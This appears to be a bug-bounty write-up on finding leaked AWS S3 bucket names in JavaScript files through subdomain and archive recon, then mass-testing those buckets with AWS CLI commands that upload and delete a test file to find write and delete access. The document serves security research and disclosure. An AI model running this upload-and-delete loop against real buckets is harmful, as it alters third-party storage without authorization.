How I was able to find mass leaked AWS S3 buckets from JS files


Santosh Kumar Sha (@killmongar1996)

Hi, everyone

My name is Santosh Kumar Sha. I'm a security researcher from India (Assam). In this article, I will describe how I was able to find mass leaked AWS S3 buckets from JS files.

Don't go outside without a reason. Stay home, be safe, and keep others safe too. A special request to my fellow bug bounty hunters: take care of your health and get vaccinated.

TOOLS used for the exploitation

1. Subfinder (https://github.com/projectdiscovery/subfinder)

2. httpx (https://github.com/projectdiscovery/httpx)

3. gau (Corben) — https://github.com/lc/gau

4. waybackurls (tomnomnom) — https://github.com/tomnomnom/waybackurls

5. subjs (lc) — https://github.com/lc/subjs

This is the write-up of a recent bug that I found while doing recon on JS files: how I was able to find mass leaked AWS S3 buckets from JS files.

Suppose we assume the target name is example.com, where everything is in scope, like this:

In-scope: *.example.com

To gather all the subdomains and their JS files from internet archives, I used the subfinder, waybackurls, and gau tools.

subfinder -d example.com -silent | httpx -silent | subjs

gau -subs example.com | grep '\.js$'

waybackurls example.com | grep '\.js$'

There is still a chance of missing a JS file, and in order to stay ahead of the game I didn't want to miss any file for testing. So I also piped subfinder through httpx into subjs to collect the JS files across every subdomain, and saved each tool's output to its own file.

gau -subs example.com | grep '\.js$' >> vul1.txt

waybackurls example.com | grep '\.js$' >> vul2.txt

subfinder -d example.com -silent | httpx -silent | subjs >> vul3.txt

Now collect all the JS file lists into one and sort out the duplicates.
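A minimal way to do that with coreutils (the merged file name all_js.txt is my own choice; the commands that follow still read vul3.txt as in the original, so substitute whichever name you prefer):

sort -u vul1.txt vul2.txt vul3.txt > all_js.txt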

JS files are a huge resource of data, and JS-file recon is a time-consuming task when filtering out information about the target. Since the files are huge, reading each one manually, one after another, is an impossible task. So I used my bash skills to extract the data from each file: curl reads each file, and grep pulls out any AWS S3 bucket leaked in it. The syntax I used is below.

cat vul3.txt | xargs -I% bash -c 'curl -sk "%" | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com"' >> s3_bucket.txt

cat vul3.txt | xargs -I% bash -c 'curl -sk "%" | grep -oE "[a-zA-Z0-9.-]+\.s3\.us-east-2\.amazonaws\.com"' >> s3_bucket.txt
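The two commands above only cover two endpoint formats. As a rough sketch, a single pass with a broader regex (my own pattern, not exhaustive) can also catch regional and dash-style S3 endpoints:

cat vul3.txt | xargs -I% bash -c 'curl -sk "%" | grep -oE "[a-zA-Z0-9.-]+\.s3[.-]([a-z0-9-]+\.)?amazonaws\.com"' | sort -u >> s3_bucket.txt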

All the AWS S3 bucket URLs are now collected and saved in the file s3_bucket.txt.

Once we have all the S3 bucket URLs, we can extract the bucket names. Below is the command to strip the endpoint suffix from each URL, leaving just the bucket name.

cat s3_bucket.txt | sed -e 's/\.s3\.us-east-2\.amazonaws\.com//' -e 's/\.s3\.amazonaws\.com//' >> bucket_name.txt
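The same bucket often shows up in many JS files, so deduplicating the name list before testing saves a lot of redundant AWS CLI calls:

sort -u bucket_name.txt -o bucket_name.txt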

Here is how I was able to automate the process of scanning the AWS S3 buckets for write and delete permissions.

I had already collected the bucket names from the JS files and stored them in a file named "bucket_name.txt".

Now, using the AWS CLI, we can automate the process:

cat bucket_name.txt | xargs -I% sh -c 'aws s3 cp test.txt "s3://%/test.txt" 2>&1 | grep "upload" && echo "AWS s3 bucket takeover by cli %"'

cat bucket_name.txt | xargs -I% sh -c 'aws s3 rm "s3://%/test.txt" 2>&1 | grep "delete" && echo "AWS s3 bucket takeover by cli %"'
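The same checks as a small, more readable loop (my own sketch; it assumes a local test.txt can be created and that the AWS CLI is configured with credentials):

#!/bin/bash
# Upload a proof-of-concept file to each bucket, then try to delete it.
echo "poc" > test.txt
while read -r bucket; do
  # "upload:" appears in aws s3 cp output on success
  if aws s3 cp test.txt "s3://$bucket/test.txt" 2>&1 | grep -q "upload"; then
    echo "writable: $bucket"
    # "delete:" appears in aws s3 rm output on success
    aws s3 rm "s3://$bucket/test.txt" 2>&1 | grep -q "delete" && echo "deletable: $bucket"
  fi
done < bucket_name.txt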

I finally got 6 more AWS S3 buckets with write and delete permissions.

I quickly reported the bug, and the next day the report was triaged as critical.


Takeaway

I'm sure a lot of security researchers have already seen this process, but this is how I approach finding mass leaked AWS S3 buckets from JS files. Recon is pretty handy; you may not know what you're missing out on.

That's one of the reasons why I wanted to share my experience, and also to highlight other techniques to exploit such vulnerabilities.

Support me if you like my work! Buy me a coffee and Follow me on Twitter.

https://www.buymeacoffee.com/killmongar1996